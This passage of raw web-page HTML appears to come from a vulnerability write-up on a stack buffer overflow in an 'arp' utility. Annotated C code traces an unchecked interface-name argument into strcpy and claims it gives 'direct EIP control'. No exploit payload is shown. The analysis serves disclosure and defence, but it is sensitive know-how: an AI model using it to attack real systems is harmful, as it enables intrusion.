class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> \t\tstatic int arp_set(char **args)\t\t\t\t\t\t\t\/** !! args==IFNAME (tainted)*\/  \t\t{  \t\t\t&#8230;  \t\t\t\/* Fetch the hardware address. *\/  \t\t\tif (*args == NULL) {\t\t\t\t\t\t\t\t\/** !! IFNAME  must be set*\/  \t\t\t\tbb_error_msg_and_die(&#8220;need hardware address&#8221;);  \t\t\t}  \t\t\tif (option_mask32 &amp; ARP_OPT_D) {\t\t\t\t\t\/** !! -d must be set*\/  \t\t\t\tarp_getdevhw(*args++, &amp;req.arp_ha);             \/** !! args never checked, pass to arp_getdevhw*\/  \t\t\t} else {  \t\t\t\tif (hw-&gt;input(*args++, &amp;req.arp_ha) &lt; 0) {  \t\t\t\t\tbb_error_msg_and_die(&#8220;invalid hardware address&#8221;);  \t\t\t\t}  \t\t\t}  \t\t  \t\t\t&#8230;  \t\t}<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-58867ec288f8a892712356-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58867ec288f8a892712356-2\">2<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58867ec288f8a892712356-3\">3<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58867ec288f8a892712356-4\">4<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58867ec288f8a892712356-5\">5<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58867ec288f8a892712356-6\">6<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58867ec288f8a892712356-7\">7<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58867ec288f8a892712356-8\">8<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58867ec288f8a892712356-9\">9<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58867ec288f8a892712356-10\">10<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58867ec288f8a892712356-11\">11<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58867ec288f8a892712356-12\">12<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58867ec288f8a892712356-13\">13<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58867ec288f8a892712356-14\">14<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58867ec288f8a892712356-15\">15<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58867ec288f8a892712356-16\">16<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58867ec288f8a892712356-17\">17<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-58867ec288f8a892712356-1\"><span class=\"crayon-h\">\t\t<\/span><span class=\"crayon-m\">static<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">int<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">arp_set<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-t\">char<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-v\">args<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\">\t\t\t\t\t\t\t<\/span><span class=\"crayon-c\">\/** !! args==IFNAME (tainted)*\/<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58867ec288f8a892712356-2\"><span class=\"crayon-h\">\t\t<\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58867ec288f8a892712356-3\"><span class=\"crayon-h\">\t\t\t<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-sy\">.<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58867ec288f8a892712356-4\"><span class=\"crayon-h\">\t\t\t<\/span><span class=\"crayon-c\">\/* Fetch the hardware address. *\/<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58867ec288f8a892712356-5\"><span class=\"crayon-h\">\t\t\t<\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-v\">args<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">==<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">NULL<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><span class=\"crayon-h\">\t\t\t\t\t\t\t\t<\/span><span class=\"crayon-c\">\/** !! IFNAME&nbsp;&nbsp;must be set*\/<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58867ec288f8a892712356-6\"><span class=\"crayon-h\">\t\t\t\t<\/span><span class=\"crayon-e\">bb_error_msg_and_die<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;need hardware address&#8221;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58867ec288f8a892712356-7\"><span class=\"crayon-h\">\t\t\t<\/span><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58867ec288f8a892712356-8\"><span class=\"crayon-h\">\t\t\t<\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">option_mask32<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">ARP_OPT_D<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><span class=\"crayon-h\">\t\t\t\t\t<\/span><span class=\"crayon-c\">\/** !! -d must be set*\/<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58867ec288f8a892712356-9\"><span class=\"crayon-h\">\t\t\t\t<\/span><span class=\"crayon-e\">arp_getdevhw<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-v\">args<\/span><span class=\"crayon-o\">++<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">req<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">arp_ha<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-c\">\/** !! args never checked, pass to arp_getdevhw*\/<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58867ec288f8a892712356-10\"><span class=\"crayon-h\">\t\t\t<\/span><span class=\"crayon-sy\">}<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">else<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58867ec288f8a892712356-11\"><span class=\"crayon-h\">\t\t\t\t<\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">hw<\/span><span class=\"crayon-o\">-&gt;<\/span><span class=\"crayon-e\">input<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-v\">args<\/span><span class=\"crayon-o\">++<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">req<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">arp_ha<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58867ec288f8a892712356-12\"><span class=\"crayon-h\">\t\t\t\t\t<\/span><span class=\"crayon-e\">bb_error_msg_and_die<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;invalid hardware address&#8221;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58867ec288f8a892712356-13\"><span class=\"crayon-h\">\t\t\t\t<\/span><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58867ec288f8a892712356-14\"><span class=\"crayon-h\">\t\t\t<\/span><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58867ec288f8a892712356-15\"><span class=\"crayon-h\">\t\t<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58867ec288f8a892712356-16\"><span class=\"crayon-h\">\t\t\t<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-sy\">.<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58867ec288f8a892712356-17\"><span class=\"crayon-h\">\t\t<\/span><span class=\"crayon-sy\">}<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0021 seconds] -->  <\/p>\n<p>3. No bounds check and buffer overwrite in arp_getdevhw<\/p>\n<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-58867ec288f8d624033781\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> \t\tstatic void arp_getdevhw(char *ifname, struct sockaddr *sa)   \/** !! ifname==args (tainted)*\/  \t\t{  \t\t\tstruct ifreq ifr;\t\t\t\t\t\t\t\t\t\t  \/** !! static stack struct, sizeof(ifreq)==40*\/  \t\t\tconst struct hwtype *xhw;\t\t\t\t\t\t\t\t  \/** !! static stack struct, sizeof(hwtype)==64*\/  \t\t  \t\t\tstrcpy(ifr.ifr_name, ifname);\t\t\t\t\t\t\t  \/** !! overwrites ifr.ifr_name[IFNAMESIZ==16] by strlen(ifname)*\/  \t  \t\t\tioctl_or_perror_and_die(sockfd, SIOCGIFHWADDR, &amp;ifr,  \t\t\t\t\t\t\t&#8220;can&#8217;t get HW-Address for &#8216;%s'&#8221;, ifname); \/** !! will do the IOCTL and die on errors*\/  \t\t\tif (hw_set &amp;&amp; (ifr.ifr_hwaddr.sa_family != hw-&gt;type)) {   \/** !! Skip &#8211; hw_set is only set by -H|-t*\/  \t\t\t\tbb_error_msg_and_die(&#8220;protocol type mismatch&#8221;);\t\t    \t\t\t}  \t\t\tmemcpy(sa, &amp;(ifr.ifr_hwaddr), sizeof(struct sockaddr));   \/** !! Skip &#8211; we do not care*\/  \t\t  \t\t\tif (option_mask32 &amp; ARP_OPT_v) {                          \/** !! Skip &#8211; we do not specify -v*\/  \t\t\t\txhw = get_hwntype(ifr.ifr_hwaddr.sa_family);  \t\t\t\tif (!xhw || !xhw-&gt;print) {  \t\t\t\t\txhw = get_hwntype(-1);  \t\t\t\t}  \t\t\t\tbb_error_msg(&#8220;device &#8216;%s&#8217; has HW address %s &#8216;%s'&#8221;,  \t\t\t\t\t\tifname, xhw-&gt;name,  \t\t\t\t\t\txhw-&gt;print((unsigned char *) &amp;ifr.ifr_hwaddr.sa_data));  \t\t\t}  \t\t} \/** !! if we do not fail in IOCTL we&#8217;ll land here &#8211; direct EIP control*\/<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-58867ec288f8d624033781-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58867ec288f8d624033781-2\">2<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58867ec288f8d624033781-3\">3<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58867ec288f8d624033781-4\">4<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58867ec288f8d624033781-5\">5<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58867ec288f8d624033781-6\">6<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58867ec288f8d624033781-7\">7<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58867ec288f8d624033781-8\">8<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58867ec288f8d624033781-9\">9<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58867ec288f8d624033781-10\">10<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58867ec288f8d624033781-11\">11<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58867ec288f8d624033781-12\">12<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58867ec288f8d624033781-13\">13<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58867ec288f8d624033781-14\">14<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58867ec288f8d624033781-15\">15<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58867ec288f8d624033781-16\">16<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58867ec288f8d624033781-17\">17<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58867ec288f8d624033781-18\">18<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58867ec288f8d624033781-19\">19<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58867ec288f8d624033781-20\">20<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58867ec288f8d624033781-21\">21<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58867ec288f8d624033781-22\">22<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58867ec288f8d624033781-23\">23<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58867ec288f8d624033781-24\">24<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-58867ec288f8d624033781-1\"><span class=\"crayon-h\">\t\t<\/span><span class=\"crayon-m\">static<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">void<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">arp_getdevhw<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-t\">char<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-v\">ifname<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">struct<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">sockaddr *<\/span><span class=\"crayon-v\">sa<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-c\">\/** !! ifname==args (tainted)*\/<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58867ec288f8d624033781-2\"><span class=\"crayon-h\">\t\t<\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58867ec288f8d624033781-3\"><span class=\"crayon-h\">\t\t\t<\/span><span class=\"crayon-t\">struct<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">ifreq <\/span><span class=\"crayon-v\">ifr<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\">\t\t\t\t\t\t\t\t\t\t&nbsp;&nbsp;<\/span><span class=\"crayon-c\">\/** !! static stack struct, sizeof(ifreq)==40*\/<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58867ec288f8d624033781-4\"><span class=\"crayon-h\">\t\t\t<\/span><span class=\"crayon-m\">const<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">struct<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">hwtype *<\/span><span class=\"crayon-v\">xhw<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\">\t\t\t\t\t\t\t\t&nbsp;&nbsp;<\/span><span class=\"crayon-c\">\/** !! static stack struct, sizeof(hwtype)==64*\/<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58867ec288f8d624033781-5\"><span class=\"crayon-h\">\t\t<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58867ec288f8d624033781-6\"><span class=\"crayon-h\">\t\t\t<\/span><span class=\"crayon-e\">strcpy<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">ifr<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">ifr_name<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">ifname<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\">\t\t\t\t\t\t\t&nbsp;&nbsp;<\/span><span class=\"crayon-c\">\/** !! overwrites ifr.ifr_name[IFNAMESIZ==16] by strlen(ifname)*\/<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58867ec288f8d624033781-7\"><span class=\"crayon-h\">\t<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58867ec288f8d624033781-8\"><span class=\"crayon-h\">\t\t\t<\/span><span class=\"crayon-e\">ioctl_or_perror_and_die<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">sockfd<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">SIOCGIFHWADDR<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">ifr<\/span><span class=\"crayon-sy\">,<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58867ec288f8d624033781-9\"><span class=\"crayon-h\">\t\t\t\t\t\t\t<\/span><span class=\"crayon-s\">&#8220;can&#8217;t get HW-Address for &#8216;%s'&#8221;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">ifname<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-c\">\/** !! will do the IOCTL and die on errors*\/<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58867ec288f8d624033781-10\"><span class=\"crayon-h\">\t\t\t<\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">hw_set<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&amp;&amp;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">ifr<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">ifr_hwaddr<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">sa_family<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">!=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">hw<\/span><span class=\"crayon-o\">-&gt;<\/span><span class=\"crayon-v\">type<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-c\">\/** !! Skip &#8211; hw_set is only set by -H|-t*\/<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58867ec288f8d624033781-11\"><span class=\"crayon-h\">\t\t\t\t<\/span><span class=\"crayon-e\">bb_error_msg_and_die<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;protocol type mismatch&#8221;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\">\t\t&nbsp;&nbsp;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58867ec288f8d624033781-12\"><span class=\"crayon-h\">\t\t\t<\/span><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58867ec288f8d624033781-13\"><span class=\"crayon-h\">\t\t\t<\/span><span class=\"crayon-e\">memcpy<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">sa<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">ifr<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">ifr_hwaddr<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">sizeof<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-t\">struct<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">sockaddr<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-c\">\/** !! Skip &#8211; we do not care*\/<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58867ec288f8d624033781-14\"><span class=\"crayon-h\">\t\t<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58867ec288f8d624033781-15\"><span class=\"crayon-h\">\t\t\t<\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">option_mask32<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">ARP_OPT_v<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-c\">\/** !! Skip &#8211; we do not specify -v*\/<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58867ec288f8d624033781-16\"><span class=\"crayon-h\">\t\t\t\t<\/span><span class=\"crayon-v\">xhw<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">get_hwntype<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">ifr<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">ifr_hwaddr<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">sa_family<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58867ec288f8d624033781-17\"><span class=\"crayon-h\">\t\t\t\t<\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-o\">!<\/span><span class=\"crayon-v\">xhw<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">||<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">!<\/span><span class=\"crayon-v\">xhw<\/span><span class=\"crayon-o\">-&gt;<\/span><span class=\"crayon-v\">print<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58867ec288f8d624033781-18\"><span class=\"crayon-h\">\t\t\t\t\t<\/span><span class=\"crayon-v\">xhw<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">get_hwntype<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58867ec288f8d624033781-19\"><span class=\"crayon-h\">\t\t\t\t<\/span><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58867ec288f8d624033781-20\"><span class=\"crayon-h\">\t\t\t\t<\/span><span class=\"crayon-e\">bb_error_msg<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;device &#8216;%s&#8217; has HW address %s &#8216;%s'&#8221;<\/span><span class=\"crayon-sy\">,<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58867ec288f8d624033781-21\"><span class=\"crayon-h\">\t\t\t\t\t\t<\/span><span class=\"crayon-v\">ifname<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">xhw<\/span><span class=\"crayon-o\">-&gt;<\/span><span class=\"crayon-v\">name<\/span><span class=\"crayon-sy\">,<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58867ec288f8d624033781-22\"><span class=\"crayon-h\">\t\t\t\t\t\t<\/span><span class=\"crayon-v\">xhw<\/span><span class=\"crayon-o\">-&gt;<\/span><span class=\"crayon-e\">print<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-t\">unsigned<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">char<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">ifr<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">ifr_hwaddr<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">sa_data<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58867ec288f8d624033781-23\"><span class=\"crayon-h\">\t\t\t<\/span><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58867ec288f8d624033781-24\"><span class=\"crayon-h\">\t\t<\/span><span class=\"crayon-sy\">}<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-c\">\/** !! if we do not fail in 